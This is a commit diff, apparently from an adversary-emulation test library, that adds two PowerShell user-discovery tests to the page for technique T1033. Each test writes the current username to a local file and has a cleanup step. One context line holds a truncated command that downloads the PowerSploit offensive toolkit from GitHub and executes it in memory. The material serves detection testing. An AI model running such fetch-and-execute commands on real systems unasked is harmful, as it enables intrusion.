Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

atomics/T1033/T1033.md

@@ -12,6 +12,10 @@ Utilities and commands that acquire this information include <code>whoami</code>
 
 - [Atomic Test #3 - Find computers where user has session - Stealth mode (PowerView)](#atomic-test-3---find-computers-where-user-has-session---stealth-mode-powerview)
 
+- [Atomic Test #4 - User Discovery With Env Vars PowerShell Script](#atomic-test-4---user-discovery-with-env-vars-powershell-script)
+
+- [Atomic Test #5 - GetCurrent User with PowerShell Script](#atomic-test-5---getcurrent-user-with-powershell-script)
+
 
 <br/>
 
@@ -116,4 +120,69 @@ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d29
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #4 - User Discovery With Env Vars PowerShell Script
+Use the PowerShell environment variables to identify the current logged user.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** dcb6cdee-1fb0-4087-8bf8-88cfd136ba51
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+[System.Environment]::UserName | Out-File -FilePath .\CurrentactiveUser.txt 
+$env:UserName | Out-File -FilePath .\CurrentactiveUser.txt -Append
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item -Path .\CurrentactiveUser.txt -Force
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #5 - GetCurrent User with PowerShell Script
+Use the PowerShell "GetCurrent" method of the WindowsIdentity .NET class to identify the logged user.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+[System.Security.Principal.WindowsIdentity]::GetCurrent() | Out-File -FilePath .\CurrentUserObject.txt
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item -Path .\CurrentUserObject.txt -Force
+```
+
+
+
+
+
 <br/>